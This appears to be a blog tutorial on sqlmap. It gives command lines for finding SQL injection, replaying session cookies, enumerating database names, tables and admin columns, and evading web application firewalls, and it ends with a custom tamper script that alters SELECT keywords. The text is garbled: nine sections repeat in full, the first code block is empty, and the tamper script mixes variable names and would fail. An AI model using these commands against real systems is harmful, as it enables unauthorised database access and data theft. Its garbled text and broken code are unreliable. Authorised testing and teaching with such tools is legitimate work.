When conducting penetration test and if you encounter any sql injection
instance, the first thing that comes to the mind is sqlmap. And if the
instance is time based blind sql injection then sqlmap is just
unavoidable.
It has many advantages to cash on like fast and reliable, open source, my much loving tamper scripts, etc. Moreover, it is not a script kiddie tool ( sorry if it has hurt you Havij ).
Let us see some of the syntax to carry out various sql injections with sqlmap.
1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable then sqlmap can act as scanner in that case.
The syntax for the GET request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy"
The syntax for the POST request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy"
This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.
Note: Through out this tutorial we will take POST request as an example. The only difference in the syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.
2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id"
sqlmap will try to check if parameter "id" is injectable or not.
3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates with the application then the steps would be as follows,
a) Login into your application.
b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.
c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.
So the syntax will be as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"
4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user
5.... To get the tables of dummydb database , the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"
6.... To get the columns of admin table, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"
7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"
8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py"
All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.
9.... Writing your own Tamper script.
There are certain cases when application has very weak detection signature but none of the tamper script can do the job.
For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to inject that target as all the payloads of sqlmap
will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.
So let us create our own tamper script. The format of any tamper script will be as follow
Code:
----------------------------------------------------
--------------------------------------------------
It has many advantages to cash on like fast and reliable, open source, my much loving tamper scripts, etc. Moreover, it is not a script kiddie tool ( sorry if it has hurt you Havij ).
Let us see some of the syntax to carry out various sql injections with sqlmap.
1.... When you have the target URL but you are not sure if any of the parameter in that request is vulnerable then sqlmap can act as scanner in that case.
The syntax for the GET request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php?id=5&text=dummy"
The syntax for the POST request is as follow
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy"
This will tell you whether any of the variable viz. id, text is vulnerable to sql injection or not.
Note: Through out this tutorial we will take POST request as an example. The only difference in the syntax of GET and POST request is that POST request has an additional switch (--data) which has your post parameters and their values.
2.... When you doubt that a particular parameter might be vulnerable to sql injection then you can specify that parameter with -p switch. The syntax is as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id"
sqlmap will try to check if parameter "id" is injectable or not.
3.... If the instance described in the last scenarios (i.e. 1, 2) is only available after user authenticates with the application then the steps would be as follows,
a) Login into your application.
b) Note down all the cookie names and its values. Let us assume that the cookies generated are cookie1=dummy_val1, cookie2=dummy_val2.
c) Use sqlmap --cookie switch to replay these cookies along with the sqlmap requests.
So the syntax will be as follows
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --cookie="cookie1=dummy_val1;cookie2=dummy_val2"
4.... To get the value of the backend database such as version name, current database name and database user, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --current-db --current-user
5.... To get the tables of dummydb database , the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --tables -D "dummydb"
6.... To get the columns of admin table, the syntax will be
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" --columns -T "admin"
7.... When you know the backend database provider such as mssql, mysql, oracle, etc. then you can specify it with the --dbms switch. This will tell sqlmap to not to try queries related to other databases and in turn can speed up the injection process.
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --dbms="oracle"
8.... If the application is protected by web application firewall (w.a.f) then you can try various tamper scripts to bypass w.a.f detection. There are almost 30 such tamper scripts available. To specify one such tamper scripts, you can use --tamper switch. The syntax is
./sqlmap.py -u "http://www.site.com/oldman.php" --data="id=5&text=dummy" -p "id" -b --tamper="tamper_script1_name.py,tamper_script2_name.py"
All the available tamper scripts can be found under the tamper directory inside sqlmap root directory.
9.... Writing your own Tamper script.
There are certain cases when application has very weak detection signature but none of the tamper script can do the job.
For example, if the application code detects "UNION SELECT" but not "UNION SELEcT" then sqlmap will not be able to inject that target as all the payloads of sqlmap
will be like "UNION ALL SELECT", "WAITFOR DELAY", etc.
So let us create our own tamper script. The format of any tamper script will be as follow
Code:
----------------------------------------------------
# Needed imports from lib.core.enums import PRIORITY # Define which is the order of application of tamper scripts against the payload __priority__ = PRIORITY.NORMAL def tamper(payload): ''' Description of your tamper script ''' retVal = payload # your code to tamper the original payload # return the tampered payload return retVal
--------------------------------------------------------------
Based on the above tamper script format, our script will be --------------------------------------------------
#!/usr/bin/env python """ Sample script by oldmanlab. Email : oldmanlab@gmail.com """ from lib.core.enums import PRIORITY __priority__ = PRIORITY.NORMAL def tamper(payload): """ INPUT : UNION ALL SELECT OUTPUT : UNION ALL SELEcT TESTED AGAINST: mysql 5.x.x """ if payload: retVal="" i=0 for i in xrange(len(payload)): if payload[i:i+10] == "ALL SELECT": retVal += "ALL SELEcT" + payload[i+10:] break else: retval += payload[i] return retVal
----------------------------------------------------------
